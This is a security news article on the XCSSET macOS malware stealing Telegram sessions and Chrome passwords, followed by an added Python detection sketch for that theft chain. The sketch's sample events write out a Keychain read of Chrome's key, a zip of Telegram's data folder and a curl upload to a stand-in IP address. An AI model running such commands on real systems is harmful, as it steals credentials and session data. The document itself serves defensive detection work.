Nasty macOS Malware XCSSET Now Targets Google Chrome, Telegram Software
Security News, July 2021
XCSSET, a malware family known for targeting macOS, has been updated once again with new capabilities for harvesting and exfiltrating sensitive data stored by a variety of apps, including Google Chrome and Telegram, as part of what researchers describe as further "refinements in its tactics."
Earlier this April, XCSSET received an upgrade that let it target macOS 11 Big Sur and Macs with Apple's M1 chip by circumventing the new security policies Apple introduced in the latest operating system.
"The malware downloads its own open tool from its C2 server that comes pre-signed with an ad-hoc signature, whereas if it were on macOS versions 10.15 and lower, it would still use the system's built-in open command to run the apps," Trend Micro researchers previously noted.
Now, according to a new write-up published by the cybersecurity firm on Thursday, XCSSET runs a malicious AppleScript file that compresses the folder containing Telegram's data into a ZIP archive and uploads it to a remote server under the attackers' control. Because that folder holds the app's logged-in session state, restoring it on another machine lets the threat actor log in as the victim without knowing the account credentials.
With Google Chrome, the malware goes after passwords saved in the browser. Chrome encrypts these with a master key it stores in the Keychain (the "Safe storage key"), so XCSSET first tricks the user into granting root privileges via a fraudulent dialog box, then abuses the elevated permissions to run an unauthorized shell command that reads that key out of the Keychain. With the key in hand it decrypts the stored passwords and transmits them to the server.
Aside from Chrome and Telegram, XCSSET can also harvest data from other apps, including Evernote, Opera, Skype, WeChat, and Apple's own Contacts and Notes, by reading it directly from their respective sandbox directories.
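The three behaviours above (reading Chrome's Keychain entry with elevated privileges, zipping an app's sandbox or group-container folder, uploading the result) are each observable in process telemetry. The following is an added example of how a detection for that chain might look; it is not code from the article or from Trend Micro. The event schema (`ts`, `pid`, `user`, `image`, `parent_image`, `argv`) and the sample events are constructed for this example, and the app data directory paths, including Telegram's group-container identifier, are assumptions drawn from common macOS layouts that you should verify against your own fleet.

```python
"""Detection sketch for the XCSSET data-theft behaviours described above.

Added example, not code from the article or from Trend Micro. Three rules
run over process-execution events:

  1. the `security` CLI reading Chrome's Keychain entry from a process
     that is not Chrome itself (Safe Storage key theft);
  2. an archiver (zip/ditto/tar) given a path inside one of the app data
     directories the article names (Telegram, Chrome, Notes, Contacts);
  3. an uploader (curl) later referencing an archive produced by rule 2.

The event schema and SAMPLE_EVENTS are constructed for this example; the
directory paths in WATCHED_APP_DIRS are assumptions, not verified facts.
"""
from __future__ import annotations

import os

# App data directories relative to the user's home (assumed paths).
WATCHED_APP_DIRS = {
    "Telegram": "Library/Group Containers/6N38VWS5BX.ru.keepcoder.Telegram",
    "Chrome": "Library/Application Support/Google/Chrome",
    "Notes": "Library/Group Containers/group.com.apple.notes",
    "Contacts": "Library/Application Support/AddressBook",
}
ARCHIVE_TOOLS = {"zip", "ditto", "tar"}
UPLOAD_TOOLS = {"curl"}
ARCHIVE_SUFFIXES = (".zip", ".tar", ".tgz", ".tar.gz")

# Constructed sample telemetry: osascript (pid 300) drives the theft
# chain; the last event is a benign archive job that must not fire.
SAMPLE_EVENTS = [
    {"ts": 1, "pid": 300, "user": "alice", "image": "/usr/bin/osascript",
     "parent_image": "/bin/zsh", "argv": ["osascript", "/tmp/x.applescript"]},
    {"ts": 2, "pid": 511, "user": "root", "image": "/usr/bin/security",
     "parent_image": "/usr/bin/osascript",
     "argv": ["security", "find-generic-password", "-wa", "Chrome"]},
    {"ts": 3, "pid": 520, "user": "alice", "image": "/usr/bin/zip",
     "parent_image": "/usr/bin/osascript",
     "argv": ["zip", "-r", "/tmp/tg.zip",
              "/Users/alice/Library/Group Containers/6N38VWS5BX.ru.keepcoder.Telegram"]},
    {"ts": 4, "pid": 530, "user": "alice", "image": "/usr/bin/curl",
     "parent_image": "/usr/bin/osascript",
     "argv": ["curl", "-F", "file=@/tmp/tg.zip", "http://203.0.113.9/upload"]},
    {"ts": 5, "pid": 540, "user": "alice", "image": "/usr/bin/zip",
     "parent_image": "/bin/zsh",
     "argv": ["zip", "-r", "/Users/alice/notes.zip", "/Users/alice/Documents/notes"]},
]


def archive_paths(argv: list[str]) -> list[str]:
    """Return argv tokens that look like archive file names."""
    return [a for a in argv[1:] if a.lower().endswith(ARCHIVE_SUFFIXES)]


def watched_apps(argv: list[str]) -> list[str]:
    """Apps whose data directory appears anywhere in the command line."""
    return sorted({app for app, rel in WATCHED_APP_DIRS.items()
                   if any(rel in a for a in argv)})


def detect(events: list[dict]) -> list[dict]:
    alerts: list[dict] = []
    staged: dict[str, list[str]] = {}   # archive path -> apps it was built from
    for ev in sorted(events, key=lambda e: e["ts"]):
        tool = os.path.basename(ev["image"])
        parent = os.path.basename(ev.get("parent_image", ""))
        argv = ev["argv"]

        # Rule 1: Keychain read of the Chrome Safe Storage entry by a
        # non-Chrome process. Chrome itself uses the Security framework,
        # not the `security` CLI, so any CLI read is worth a look.
        if (tool == "security" and "find-generic-password" in argv
                and any("Chrome" in a for a in argv)
                and "Google Chrome" not in parent):
            alerts.append({"rule": "chrome_safe_storage_key_read", "pid": ev["pid"],
                           "user": ev["user"], "parent": parent})

        # Rule 2: an app data directory being packed into an archive.
        elif tool in ARCHIVE_TOOLS:
            apps = watched_apps(argv)
            if apps:
                outs = archive_paths(argv)
                for p in outs:
                    staged[p] = apps
                alerts.append({"rule": "app_data_archived", "pid": ev["pid"],
                               "apps": apps, "archives": outs, "parent": parent})

        # Rule 3: an upload that references an archive staged by rule 2.
        elif tool in UPLOAD_TOOLS:
            hits = [p for p in staged if any(p in a for a in argv)]
            if hits:
                alerts.append({"rule": "staged_archive_uploaded", "pid": ev["pid"],
                               "archives": hits,
                               "apps": sorted({x for p in hits for x in staged[p]}),
                               "parent": parent})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Rule 3 is the one that turns two individually noisy signals (users do zip their own folders, and the `security` tool has legitimate uses) into something actionable: an archive built from an app's data directory and then handed to an uploader in the same session. Recording the parent image on every alert matters here because, per the article, the archiving is driven from AppleScript, so `osascript` as the parent of `zip` or `curl` is itself a strong qualifier.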